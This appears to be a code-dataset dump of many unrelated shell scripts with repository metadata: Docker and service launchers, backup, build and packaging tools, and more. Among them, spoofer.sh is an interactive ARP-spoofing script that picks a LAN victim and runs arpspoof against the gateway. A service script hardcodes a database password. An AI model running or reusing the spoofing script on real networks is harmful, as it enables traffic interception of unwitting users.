|
UTF-8
| 543
| 2.609375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
export POSTGRES_DB=testdb
export POSTGRES_USER=vertx
export POSTGRES_PASSWORD=password
docker run -d \
-e POSTGRES_USER \
-e POSTGRES_PASSWORD \
-e POSTGRES_DB \
--name "some-postgres-ssl" \
-v $(pwd)/src/test/resources/ssl-docker/server.crt:/docker-entrypoint-initdb.d/server.crt \
-v $(pwd)/src/test/resources/ssl-docker/server.key:/docker-entrypoint-initdb.d/server.key \
-v $(pwd)/src/test/resources/ssl-docker/init.sh:/docker-entrypoint-initdb.d/init.sh \
-p 54321:5432 \
"postgres:9.4.4"
| true
|
556020afffd46d42b2dd44299fc66668614de7f6
|
Shell
|
takshingchan/citm
|
/similarity/experiment-1
|
UTF-8
| 676
| 3.234375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#
# experiment-1
#
# This shell script calculates the distance between all 26 Bach
# motives and the two prototypes in Cambouropoulos (2001).
#
# Copyright (C) 2006 Tak-Shing Chan
#
# Running the experiment
mkdir -p results/cambouropoulos
for i in dist1 dist2 dist3; do
rm -f results/cambouropoulos/bach-$i
for ((j = 1; j <= 26; j++)); do
echo `../information/chan/ncf-ftd/$i \
opmfiles/cambouropoulos/$j.opm \
opmfiles/cambouropoulos/1.opm` \
`../information/chan/ncf-ftd/$i \
opmfiles/cambouropoulos/$j.opm \
opmfiles/cambouropoulos/12.opm` >> results/cambouropoulos/bach-$i
done
done
| true
|
799a4ebcdf37ad911df2fd816f31b23be0fc02c0
|
Shell
|
johnraff/google-translate
|
/devscripts/bump_version.sh
|
UTF-8
| 844
| 4.21875
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# Script to bump the version and update the README.md & docs/*
# Last-Revision: 2016-12-09
#
# Usage: ./bump_version.sh <new-version>
FILES=`cat <<EOF
google_translate/version.py
README.md
docs/intro.rst
docs/conf.py
EOF`
function update_version {
echo "Updating file: $3"
sed -i "s/$1/$2/g" $3
}
if [ $# -ne 1 ]; then
echo "Usage: ./bump_version.sh <new-version>"
exit 1
fi
cd ..
new_version=$1
cur_version=$(grep "version" "google_translate/version.py" | cut -d " " -f 3 | tr -d "'")
echo "Current version = $cur_version"
echo "New version = $new_version"
echo
for file in $FILES; do
update_version $cur_version $new_version $file
done
cd "devscripts"
read -p "Rebuild HTML docs? (y/n) " choice
if [[ $choice == 'y' || $choice == 'Y' ]]; then
./build_html_docs.sh
fi
echo "Done"
exit 0
| true
|
a48ffb8e3fc7aac216459ded53b70e1c2c53c1d4
|
Shell
|
sebaofshanxi/MathEquInspect
|
/etc/mathinspect_svc.sh
|
UTF-8
| 1,477
| 3.765625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
echo "Service [$APP_NAME] - [$1]"
export APP_HOME=/opt/mathinspect
export APP_NAME=mathinspect
export APP_PORT=9001
echo " JAVA_HOME=$JAVA_HOME"
echo " APP_HOME=$APP_HOME"
echo " APP_NAME=$APP_NAME"
echo " APP_PORT=$APP_PORT"
function start {
if pkill -0 -f $APP_NAME.war > /dev/null 2>&1
then
echo "Service [$APP_NAME] is already running. Ignoring startup request."
exit 1
fi
echo "Starting application..."
nohup sudo -u sboot java -jar $APP_HOME/$APP_NAME.war --spring.datasource.password=xiwang --inspection.image.server=http://72.93.93.60/formula_images/ --server.port=$APP_PORT < /dev/null > /dev/null 2>&1 &
}
function stop {
if ! pkill -0 -f $APP_NAME.war > /dev/null 2>&1
then
echo "Service [$APP_NAME] is not running. Ignoring shutdown request."
exit 1
fi
# First, we will try to trigger a controlled shutdown using
# spring-boot-actuator
curl -X POST http://localhost:$APP_PORT/shutdown < /dev/null > /dev/null 2>&1
# Wait until the server process has shut down
attempts=0
while pkill -0 -f $APP_NAME.war > /dev/null 2>&1
do
attempts=$[$attempts + 1]
if [ $attempts -gt 5 ]
then
# We have waited too long. Kill it.
pkill -f $APP_NAME.war > /dev/null 2>&1
fi
sleep 1s
done
}
case $1 in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
esac
exit 0
| true
|
2bcc016189a36ab3c7e00ff07d77c1b486abc432
|
Shell
|
petronny/aur3-mirror
|
/otf-dejavusansmono-powerline-git/PKGBUILD
|
UTF-8
| 1,094
| 3.140625
| 3
|
[] |
no_license
|
# Maintainer: Thomas Ruoff <tomru@ido.cassiopeia.uberspace.de>
pkgname=otf-dejavusansmono-powerline-git
pkgver=20130413
pkgrel=1
pkgdesc="Pre-patched and adjusted version for usage with the new Powerline plugin"
arch=('any')
url='https://github.com/Lokaltog/powerline-fonts/tree/master/DejaVuSansMono'
license=('unknown')
depends=('fontconfig' 'xorg-font-utils')
makedepends=('git')
optdepends=('python-powerline-git: The ultimate statusline/prompt utility'
'python2-powerline-git: The ultimate statusline/prompt utility')
install=${pkgname}.install
source=()
md5sums=('SKIP')
_gitroot='https://github.com/Lokaltog/powerline-fonts'
_gitname='powerline-fonts'
build() {
cd "$srcdir"
msg "Connecting to GIT server..."
if [ -d "${srcdir}/${_gitname}" ]; then
cd "$_gitname" && git pull origin
cd "$srcdir"
msg "The local files are updated."
else
git clone --depth=1 "$_gitroot" "$_gitname"
fi
msg "GIT checkout done or server timeout"
}
package() {
cd "${srcdir}/${_gitname}/DejaVuSansMono"
local font='DejaVu Sans Mono for Powerline.otf'
install -Dm644 "$font" "${pkgdir}/usr/share/fonts/OTF/$font"
}
| true
|
e55e6b24e71ec6df4139834796dbbd18f30ab836
|
Shell
|
jhhwang4195/zinst_making_tool
|
/package_listup
|
UTF-8
| 2,450
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
BaseRoot=`cat /usr/bin/zinst |grep "^ZinstBaseRoot=" | awk -F'=' '{print $2}' | sed -s 's/"//g'`
DistDir=$BaseRoot/dist
cd $DistDir
List=`ls -l |egrep "\.zinst" |awk '{print $9}'`
Listup=`echo $List`
ListupNum=`echo $Listup | awk '{print NF}'`
echo "======================================================"
echo " Package information creating..."
echo " Please hold a sec."
echo "======================================================"
echo "Latest update = `date +%Y.%m.%d` `date +[%T]`" > $DistDir/checker/package_dist_list.info
Count=1
while [ $Count -le $ListupNum ]
do
PackageP=`echo $Listup | awk '{print $'$Count'}'`
Pack_name=`echo $PackageP | awk -F '-' '{print $1}'`
tar zxfp $PackageP $Pack_name.zicf
### Find Package name
head -14 $Pack_name.zicf |sed -e 's/ = /=/g' > $DistDir/checker/package_dist_listing
### Fetch a dependecy file list
CheckRequireRaw=`cat $Pack_name.zicf |grep "^ZINST requires pkg "| awk '{print $4}'`
CheckRequire=`echo $CheckRequireRaw`
### Move a zicf file to Dist dir
mv $Pack_name.zicf $DistDir/checker/
### Parse a Key value for the Dist
echo "echo \"| \$PACKAGENAME | \$VERSION | \$AUTHORIZED | \$CUSTODIAN | \$DESCRIPTION | $CheckRequire |@ \" " >> $DistDir/checker/package_dist_listing;
sed -i "/^FILE/d" $DistDir/checker/package_dist_listing
sed -i "/^CONF/d" $DistDir/checker/package_dist_listing
sed -i "/^SYMB/d" $DistDir/checker/package_dist_listing
sed -i "/^CRON/d" $DistDir/checker/package_dist_listing
sed -i "/^COMM/d" $DistDir/checker/package_dist_listing
chmod 755 $DistDir/checker/package_dist_listing;
ExistPkg=`sh $DistDir/checker/package_dist_listing | awk '{print $2}'`
### Package maintenance list create
sed -i "/^| $ExistPkg/d" $DistDir/checker/package_dist_list.info
#sh $DistDir/checker/package_dist_listing
sh $DistDir/checker/package_dist_listing >> $DistDir/checker/package_dist_list.info
rm -f $DistDir/checker/package_dist_listing
WatchC=`echo $Count |grep "0"`
if [[ $WatchC != "" ]]
then
echo "======================================================"
echo " $Count Package done "
echo "======================================================"
fi
let Count=Count+1
done
echo " "
echo " "
echo "======================================================"
echo " $ListupNum Package(s) Information had been created"
echo "======================================================"
| true
|
cd5f07816f96b81162b34259f8d11d5dc41c1109
|
Shell
|
wilke/M5nr-deprecated
|
/ReleaseTools/mkworkdir
|
UTF-8
| 3,171
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/sh
########################################################################
# mkworkdir
#
# Makes a work area in which to check out packages, build, test, etc.
# This simply makes a directory, copies a top-level makefile into it from
# the release, and installs a set of directories and a config file assumbed
# by the build tools
#
# Usage:
# mkworkdir -r <releaseName> <workDirName>
#
# Assumes:
# RTROOT is set to point to the root of the release area. Releases
# live in $RTROOT/dist/releases
#
# History:
# 01 Dec 03 efrank First version. With thanks to Terry Hung and
# Bob Jacobsen (newrel in SoftRelTools. SLAC/LBL)
#
########################################################################
#++ params
# name of the package with release tools
releasetoolsname=ReleaseTools
#++ vars
baserelname=current
#-----------------------------------------------------------------------
#++ process options
set -- `getopt r: $*`
if [ $? = 0 ]; then
while [ $1 != -- ]
do
case $1 in
-r) baserelname=$2; shift;;
esac
shift
done
shift
fi
#-----------------------------------------------------------------------
#++ check for correct number of arguments
if [ "$#" -ne 1 ]; then
echo "One argument required"
echo "Usage: mkworkdir -r <releaseName> <workDirName>"
exit 2
fi
workdirname=$1
#-----------------------------------------------------------------------
#++ Makesure the work directory does not already exist
if [ -r $workdirname ]; then
echo $workdirname already exists
exit 2
fi
#-----------------------------------------------------------------------
#++ Find Base release
if [ -z "$RTROOT" ]; then
echo "No RTROOT set"
exit 2
fi
baserel=$RTROOT/dist/releases/$baserelname
if [ ! -r "$baserel" ]; then
echo "No such release: " $baserel
exit 2
fi
#-----------------------------------------------------------------------
#++ Make sure the ReleaseTools package is there (to get top level
# makefiles, etc.).
if [ ! -r "$baserel/$releasetoolsname" ]; then
echo "No $releasetoolsname" in the base release
exit 2
fi
releasetools=$baserel/$releasetoolsname
#-----------------------------------------------------------------------
#++ Make sure the top level makefile is there
if [ ! -r $releasetools/Makefile.top ]; then
echo "Invalid $releasetools: no top level makefile"
exit 2
fi
#-----------------------------------------------------------------------
#++ Make the directory structure
mkdir $workdirname
cd $workdirname
#mkdir bin
#mkdir bin/$RTARCH
#mkdir lib
#mkdir lib/$RTARCH
#mkdir tmp
#mkdir tmp/$RTARCH
#mkdir CGI
cp -p $releasetools/Makefile.top ./Makefile
echo "baserelname=$baserelname" > rtConfig
make installdirs
#-----------------------------------------------------------------------
#++ debug...delete real soon
echo "baserel : " $baserel
echo "baserelname : " $baserelname
echo "releasetools: " $releasetools
echo "workdirname : " $workdirname
| true
|
d42e51734c3d05acef999a7feefdb80ea578ad64
|
Shell
|
youm59/dotfiles
|
/post-kaos-install.sh
|
UTF-8
| 1,202
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Small personnal script to run just after kaos install
# VARIABLES
Savef=mermouy.dot
Sext=tar.bz2
Source=/media/Remise/save
Wkdir=/tmp
# Gist files to retrieve
Pkgbproto=https://gist.githubusercontent.com/kaos-addict/0a8b0f46713a9dadd4c2/raw/f0a1afb05d7f7a53889bb3847c0f860f1035318a/kaos-pkgbuild-commented-proto
# Extract savefiles
cd $Wkdir
case $Sext in
tar.bz2) tar -xvjf $Source/$Savef.$Sext || echo "Problem while extracting tar.bz2 savefiles";;
tar.gz) tar -xvzf $Source/$Savef.$Sext || echo "Problem while extracting tar.gz savefiles";;
tar.xz) tar -xvJf $Source/$Savef.$Sext || echo "Problem while extracting tar.xz savefiles";;
esac
### Bashfiles
for bf in $(ls bash*)
do
bfname=$(basename $bf)
cp -f $bf $HOME/.$bfname
chown $USER:users $HOME/.$bfname
chmod 744 $HOME/.$bfname
done
### TODO: Other dot files
### TODO: confirmation dialog (qarma?)
# .config dir TODO:and personnal stuff
rsync --remove-source-files .config/ $HOME/.config/ && find -type d -empty -delete
### Get bunch of gist files helpers
# KaoS PKGBUILD prototype file
wget $Pkgbproto && kdesu mv kaos-pkgbuild-commented-proto /usr/share/pacman/PKGBUILD.commented.proto
| true
|
2264139b1a74163b8980f3f62f248acb25f31361
|
Shell
|
sosokill59/Spoofer
|
/spoofer.sh
|
UTF-8
| 2,991
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
function liste() {
sudo arp-scan --interface=$interface --localnet > listeip.txt
nb=$(grep '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1) | wc -l )
echo "$nb Machines dans le réseau: "
grep '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1)
for var in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' listeip.txt | grep -v $(route -n | tail +3 | head -n1 | awk '{print $2 }') | grep -v $(hostname -I | cut -d " " -f 1) )
do
tab[i]=$var
((i++))
done
}
function spoof() {
echo "Entrez IP: "
read ip
existe=0
for iptab in ${tab[@]}
do
if [[ $ip == $iptab ]]
then
existe=1
fi
done
while [[ $existe -ne 1 ]]
do
echo "La machine n'existe pas ou n'est pas valide entrez une nouvelle IP : "
read ip
for iptab in ${tab[@]}
do
if [[ $ip == $iptab ]]
then
existe=1
fi
done
done
echo "Lancement Interface Xterm "
xterm -e "arpspoof -i $interface -t $ip -r $(route -n | tail +3 | head -n1 | awk '{print $2}') ; $SHELL" &
}
function verif(){
check=1
dsniff=$(dpkg-query -W -f='${Status}' dsniff 2>/dev/null)
arpscan=$(dpkg-query -W -f='${Status}' arp-scan 2>/dev/null)
xterm=$(dpkg-query -W -f='${Status}' xterm 2>/dev/null)
if [[ $dsniff != *"ok"* ]]
then
$check = 0
echo "Install dsniff"
fi
if [[ $arpscan != *"ok"* ]]
then
$check = 0
echo "Install arpscan"
fi
if [[ $xterm != *"ok"* ]]
then
$check = 0
echo "Install xterm"
fi
}
verif
if [[ $check == 1 ]]
then
root=$(whoami)
if [[ $root != "root" ]]
then
echo "Need to be root "
else
routage=$(cat /proc/sys/net/ipv4/ip_forward )
echo " "
echo "Routage des paquets: $routage"
echo Adresse Local: $(hostname -I | cut -d " " -f 1)
echo Adresse Router: $(route -n | tail +3 | head -n1 | awk '{print $2 }')
echo "Liste interfaces:"
echo " "
tab=[]
element=$(ifconfig | grep "RUNNING" | cut -d " " -f 1 | cut -d ":" -f 1)
i=0
for var in $element
do
tab[$i]=$var
echo "$i : $var"
((i++))
done
echo " "
echo "Entrez le numéro de l' interface (0-$(($i-1)))":
read id
while (( $id < 0 || $id > $(($i-1)) ))
do
echo Entrez un numéro valide interface:
read id
done
interface=${tab[$(($id))]}
echo Choice : $interface
liste
echo "Voulez vous re-scanner ? OUI - NON "
read choix
while [[ $choix == "OUI" || $choix == "oui" ]]
do
liste
echo "Voulez vous re-scanner ? OUI - NON "
read choix
done
spoof
echo "Voulez-vous spoofer une autre machine ? OUI - NON "
read rep
while [[ $rep == "OUI" || $rep == "oui" ]]
do
liste
spoof
echo "Voulez-vous spoofer une autre machine ? OUI - NON "
read rep
done
fi
fi
| true
|
f3a0741d50a7674919f27a0d18f9da6e0183d764
|
Shell
|
jandado/hass-smartbox
|
/scripts/pre-commit-check.sh
|
UTF-8
| 824
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
function manifest_version() {
sed -n -e 's/^.*"version": "\([0-9\.]\+\)".*$/\1/p' custom_components/smartbox/manifest.json
}
function changelog_version() {
sed -n -e 's/^.*## \([0-9\.]\+\).*$/\1/p' CHANGELOG.md | head -1
}
function manifest_smartbox_version() {
sed -n -e 's/^.*\(smartbox[=><]\+[0-9\.]\+\).*$/\1/p' custom_components/smartbox/manifest.json
}
function requirements_smartbox_version() {
sed -n -e 's/^.*\(smartbox[=><]\+[0-9\.]\+\).*$/\1/p' requirements.txt
}
if [[ $(manifest_version) != $(changelog_version) ]]
then
echo "Manifest version does not match changelog" >&2
exit 1
fi
if [[ $(manifest_smartbox_version) != $(requirements_smartbox_version) ]]
then
echo "Manifest smartbox version does not match requirements smartbox version" >&2
exit 1
fi
| true
|
5280766f96e40a2ed77dadd4d1bb78da149df1b9
|
Shell
|
rynge/ariella
|
/jetstream/salt/htcondor/master_shutdown_script.sh
|
UTF-8
| 317
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# ignore shutdown in the beginning of the uptime - let's the system settle down
UPTIME=`cat /proc/uptime | sed 's/[\. ].*//'`
if [ $UPTIME -lt 1800 ]; then
exit 0
fi
if [ -e /tmp/do-not-shutdown ]; then
exit 0
fi
logger "Shutting down node due to lack of work!"
/sbin/shutdown -h now
exit 0
| true
|
6945d3b6f895c58cb6e41f70863dad67389ae48f
|
Shell
|
Cloudxtreme/dotfiles-26
|
/scripts/backup.sh
|
UTF-8
| 7,106
| 3.625
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
mountables=(
"/mnt/vortex"
"/mnt/raidstorage"
"/mnt/xfsmedia"
)
backup_source_dirs=(
"/home/panther/docs"
"/home/panther/docs"
"/home/panther/media/pictures"
"/home/panther/media/pictures"
"/mnt/raidstorage/media/audio"
"/mnt/raidstorage/media/video"
"/mnt/ssdstorage/music"
"/mnt/ssdstorage/music"
)
backup_dest_dirs=(
"${mountables[1]}/backups/docs"
"${mountables[0]}/backups/docs"
"${mountables[1]}/backups/pictures"
"${mountables[0]}/backups/media/pictures"
"${mountables[0]}/backups/media/audio"
"${mountables[0]}/backups/media/video"
"${mountables[0]}/backups/media/music"
"${mountables[2]}/music"
)
systembackupdir="${mountables[1]}/backups/system/"
systembackupdir2="${mountables[0]}/backups/system/"
virtualmachinesdir="/opt/virtualmachines/"
logdir="/var/log/backup/"
# Escape asterisks, otherwise shell expansion is made.
systembackupexcludelist=(
"/sys/\*"
"/proc/\*"
"/dev/shm/\*"
"/tmp/\*"
"/var/tmp/\*"
"/mnt/dvd/\*"
"/mnt/exports/\*"
"/mnt/misc/\*"
"/mnt/phone/\*"
"/mnt/raidstorage/\*"
"/mnt/ssdstorage/\*"
"/mnt/storage1/\*"
"/mnt/storage2/\*"
"/mnt/vortex/\*"
"/mnt/xfsmedia/\*"
"/home/\*"
"/usr/portage/distfiles/\*"
"$virtualmachinesdir\*.img"
"$virtualmachinesdir\*.qcow2"
"$virtualmachinesdir\*.iso"
)
homebackupexcludelist=(
"/home/panther/docs/\*"
"/home/panther/media/pictures/\*"
"/home/panther/misc/\*"
"/home/panther/ramdisk/\*"
)
if test "$(echo $HOME)" != "/root"
then echo You must be root to maintain permissions!
exit
fi
echo "Mounting partitions if not already mounted..."
for mountable in ${mountables[@]}
do
if test "empty$(cat /etc/mtab | grep $mountable)" == "empty"
then mount $mountable 2>/dev/null &
fi
done
wait
for mountable in ${mountables[@]}
do
if test "empty$(cat /etc/mtab | grep $mountable)" == "empty"
then echo "Mounting $mountable failed."
sleep 1
fi
done
echo "Starting backup in three seconds..."
sleep 1
echo "Starting backup in two seconds..."
sleep 1
echo "Starting backup in one second..."
sleep 1
# If pigz is found, use threaded compression.
if [ $(which pigz 2>/dev/null) ]
then
parallel=1
else
parallel=0
fi
datestring=$(date +%F)
echo
echo "*******************************************************************************"
echo "Synchronising misc backup directories..."
num_of_misc=${#backup_source_dirs[@]}
if [ $num_of_misc -ne ${#backup_dest_dirs[@]} ]
then
echo "The number of misc backup source and destination directories does not match!"
echo "Aborting..."
exit 1
fi
index=0
while [ $index -lt $num_of_misc ]
do
sourcedir="${backup_source_dirs[$index]}/"
destdir="${backup_dest_dirs[$index]}/"
if ! [ -e $destdir ]
then
echo "Destination directory $destdir does not exist, skipping..."
else
echo
echo "*******************************************************************************"
echo "Synchronising $sourcedir with $destdir..."
rsync -ah --progress --delete --log-file "$logdir""$datestring""_rsync_""$index"".log" $sourcedir $destdir
fi
index=$(expr $index + 1)
done
if test "X$1" == "Xmisconly"
then
exit
fi
if ! [ -e $systembackupdir ]
then
echo "System backup directory $systembackupdir does not exist."
echo "Aborting system backup..."
exit
fi
if test "X$1" != "Xsynconly"
then
echo
echo "*******************************************************************************"
echo "Beginning system backup..."
echo "To restore: tar -C /[home] -xvpzf archive.tgz"
mbrbackupfile="$systembackupdir/$HOSTNAME-MBR-backup-$datestring.bak"
systembackupfile="$systembackupdir/$HOSTNAME-system-backup-$datestring.tgz"
homebackupfile="$systembackupdir/$HOSTNAME-home-backup-$datestring.tgz"
dd if=/dev/sda of=$mbrbackupfile bs=512 count=1
echo
echo "MBR backup created."
excludelist=""
for excludeitem in ${systembackupexcludelist[@]}
do
# Prefix every item with . so that we may use relative paths with tar.
excludelist="$excludelist --exclude=.$excludeitem"
done
excludelist=$(echo $excludelist | sed "s/\\\\\*/*/g")
echo
echo "Creating system backup, see /dev/shm/backup.out for progress."
if [ $parallel -eq 1 ]
then
tar -C / --index-file /dev/shm/backup.out $excludelist -cvpf - ./ | pigz -c > $systembackupfile
else
tar -C / --index-file /dev/shm/backup.out $excludelist -cvpzf $systembackupfile ./
fi
echo "Moving log file to $logdir..."
mv /dev/shm/backup.out $logdir
distfilesdir=$systembackupdir/distfiles/
echo
echo "Backing up distfiles..."
if ! [ -d $distfilesdir ]
then
if [ -e $distfilesdir ]
then
echo "$distfilesdir exists but is not a directory! Aborting..."
exit 1
fi
mkdir $distfilesdir
fi
rsync -ah --progress --delete /usr/portage/distfiles/ $distfilesdir
excludelist=""
for excludeitem in ${homebackupexcludelist[@]}
do
# Prefix every item with . so that we may use relative paths with tar.
excludelist="$excludelist --exclude=.$excludeitem"
done
excludelist=$(echo $excludelist | sed "s/\\\\\*/*/g")
echo
echo "*******************************************************************************"
echo "Backing up home directories..."
if [ $parallel -eq 1 ]
then
tar -C / --one-file-system -cpf - $excludelist ./home | pigz -c > $homebackupfile
else
tar -C / --one-file-system -cpzf $homebackupfile $excludelist ./home
fi
if test "X$1" != "Xnovms"
then
vm_backupdir="$systembackupdir""vm_images/"
echo
echo "*******************************************************************************"
echo "Backing up virtual machine images..."
if ! [ -d $vm_backupdir ]
then
if [ -e $vm_backupdir ]
then
echo "$vm_backupdir exists but is not a directory! Aborting..."
exit 1
fi
mkdir $vm_backupdir
fi
if [ $parallel -eq 1 ]
then
gzipexe="pigz"
else
gzipexe="gzip"
fi
find $virtualmachinesdir -regex ".*\.img\|.*\.qcow2\|.*\.iso" -printf "%f\n" | xargs -I {} sh -c "$gzipexe -c $virtualmachinesdir'{}' > $vm_backupdir'{}'.gz"
fi
fi
if test "empty$systembackupdir2" != "empty"
then
echo
echo "*******************************************************************************"
echo "Synchronizing $systembackupdir with $systembackupdir2..."
if ! [ -e $systembackupdir2 ]
then
echo "Destination directory $destdir does not exist, skipping..."
else
rsync -avh --progress --delete $systembackupdir $systembackupdir2
fi
fi
echo
echo "*******************************************************************************"
echo "All done!"
echo
read
| true
|
98850ccf6738791af8f2f7eab1e82b6c1001717c
|
Shell
|
gregoryjjb/cs160
|
/install.sh
|
UTF-8
| 2,343
| 3.34375
| 3
|
[] |
no_license
|
# start from inside cs160 folder.
# Will add a directory at the same level as the cs160 folder for OpenFace
cd ..
# Exit script if any command fails
set -e
set -o pipefail
if [ $# -ne 0 ]
then
echo "Usage: install.sh"
exit 1
fi
# install FFMPEG
sudo apt-get -y install ffmpeg
# Install OpenFace and all of it's dependencies
git clone https://github.com/TadasBaltrusaitis/OpenFace
cd OpenFace
# Essential Dependencies
echo "Installing Essential dependencies..."
sudo apt-get -y update
sudo apt-get -y install build-essential
sudo apt-get -y install llvm
sudo apt-get -y install clang-3.8 libc++-dev libc++abi-dev
sudo apt-get -y install cmake
sudo apt-get -y install libopenblas-dev liblapack-dev
sudo apt-get -y install git libgtk2.0-dev pkg-config libavcodec-dev libavformat-dev libswscale-dev
sudo apt-get -y install python-dev python-numpy libtbb2 libtbb-dev libjpeg-dev libpng-dev libtiff-dev libdc1394-22-dev checkinstall
echo "Essential dependencies installed."
# OpenCV Dependency
echo "Downloading OpenCV..."
wget https://github.com/opencv/opencv/archive/3.4.0.zip
unzip 3.4.0.zip
cd opencv-3.4.0
mkdir -p build
cd build
echo "Installing OpenCV..."
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local -D FORCE_VTK=ON -D WITH_TBB=ON -D WITH_V4L=ON -D WITH_OPENGL=ON -D WITH_GDAL=ON -D WITH_XINE=ON -D WITH_CUDA=OFF ..
make -j4
sudo make install
cd ../..
rm 3.4.0.zip
sudo rm -r opencv-3.4.0
echo "OpenCV installed."
# Boost C++ Dependency
echo "Installing Boost..."
sudo apt-get install libboost-all-dev
echo "Boost installed."
# Dlib dependency
# OpenCV is supposed to download this for us, but I coudln't get their install to work
echo "Installing dlib..."
wget http://dlib.net/files/dlib-19.6.tar.bz2
tar xvf dlib-19.6.tar.bz2
cd dlib-19.6/
mkdir build
cd build
cmake ..
cmake --build . --config Release
sudo make install
sudo ldconfig
cd ../..
echo "dlib installed."
# OpenFace installation
echo "Installing OpenFace..."
mkdir -p build
cd build
cmake -D CMAKE_BUILD_TYPE=RELEASE ..
sudo make install
cd ../..
echo "OpenFace successfully installed."
# Install our processing application
echo "Installing processing application..."
cd cs160/CVProcessor
make CONF=Release
cd ../..
sudo rm -rf OpenFace
cd cs160
echo "Processing application installed. Located in cs160/CVProcessor/dist/Release"
| true
|
d93a98c0a1a29c1763f0de788c7c658a7977d4f2
|
Shell
|
pseudoPixels/SciWorCS
|
/app_collaborative_sci_workflow/GalaxyToolBase/phenotype_association/lps_tool_wrapper.sh
|
UTF-8
| 1,142
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# script for execution of deployed applications
#
# Sets up the MCR environment for the current $ARCH and executes
# the specified command.
#
export PATH=$PATH:$(dirname $0)
MCRROOT=${MCRROOT:-/galaxy/software/linux2.6-x86_64/bin/MCR-7.11/v711}
MWE_ARCH=glnxa64
if [ "$MWE_ARCH" = "sol64" ] ; then
LD_LIBRARY_PATH=.:/usr/lib/lwp:${MCRROOT}/runtime/glnxa64
else
LD_LIBRARY_PATH=.:${MCRROOT}/runtime/glnxa64
fi
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRROOT}/bin/glnxa64
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRROOT}/sys/os/glnxa64
if [ "$MWE_ARCH" = "maci" -o "$MWE_ARCH" = "maci64" ]; then
DYLD_LIBRARY_PATH=${DYLD_LIBRARY_PATH}:/System/Library/Frameworks/JavaVM.framework/JavaVM:/System/Library/Frameworks/JavaVM.framework/Libraries
else
MCRJRE=${MCRROOT}/sys/java/jre/glnxa64/jre/lib/amd64
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/native_threads
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/server
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}/client
LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${MCRJRE}
fi
XAPPLRESDIR=${MCRROOT}/X11/app-defaults
export LD_LIBRARY_PATH XAPPLRESDIR
lps_tool $*
exit 0
| true
|
7de8549932dc0dcd9949c394183fdd895c7152d5
|
Shell
|
DaemonDave/CFront-3.0.3.1
|
/bat/00-CLEAN.sh
|
UTF-8
| 859
| 2.515625
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
rm LOG.0? 2> /dev/null
rm cfront cfront.old munch munch.old libC.a libC.a.old 2> /dev/null
[ -L incl ] && rm incl
make -C src clean 2> /dev/null
make -C scratch clean 2> /dev/null
rm lib/mk/*.o lib/mk/*..c 2> /dev/null
rm lib/complex/mk/*.o lib/complex/mk/*.a lib/complex/mk/*..c 2> /dev/null
D=demo/hello
rm $D/hello.i $D/hello..c $D/hello.o $D/hello..o 2> /dev/null
rm $D/hello.tmp 2> /dev/null
rm $D/hello.cdts..c $D/hello.cdts.o $D/a.out 2> /dev/null
rm $D/hello 2> /dev/null
rm $D/c++_c_output..c $D/c++_c_output_C $D/c++_c_output_c 2> /dev/null
make -C tools/demangler clobber 2> /dev/null
make -C tools/pt clobber 2> /dev/null
rm ptcomp ptlink c++filt 2> /dev/null
make -C lib/complex/mk clean 2> /dev/null
rm libcomplex*.a 2> /dev/null
for i in *.sh; do
[ -L $i ] && rm $i
done
[ -L CC ] && {
rm CC
ln -s CC3 CC
}
| true
|
d1e3f5a9db8e61195753b6558eab5c130c7ff132
|
Shell
|
allan-zhou/shelldemo
|
/docker/rm-container.sh
|
UTF-8
| 574
| 3.9375
| 4
|
[] |
no_license
|
#! /bin/bash
# 删除所有的docker container
COUNT=0
function rmContainers(){
CONTAINER_IDS=$(docker ps -aq)
echo
if [ -z "$CONTAINER_IDS" -o "$CONTAINER_IDS" = " " ]; then
echo "========== No containers available for deletion =========="
else
for container_id in $CONTAINER_IDS
do
let "COUNT += 1"
done
echo "========== 共 $COUNT 个容器 =========="
docker rm -f $CONTAINER_IDS
echo "所有容器以成功删除"
fi
echo
}
rmContainers
| true
|
82282f321fde25ad123c3b73ad9330b6d294ff92
|
Shell
|
techiaith/docker-marytts
|
/voicebuilder/egs/lleisiwr/build.sh
|
UTF-8
| 485
| 2.953125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
CWD_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
while getopts u: flag
do
case "${flag}" in
u) userid=${OPTARG};;
esac
done
${MARYTTS_HOME}/target/marytts-${MARYTTS_VERSION}/bin/marytts-server &
rm -rf /voices/${userid}_cy
mkdir -p /voices/${userid}_cy/data
cp -v /data/lleisiwr/${userid}/* /voices/${userid}_cy/data/
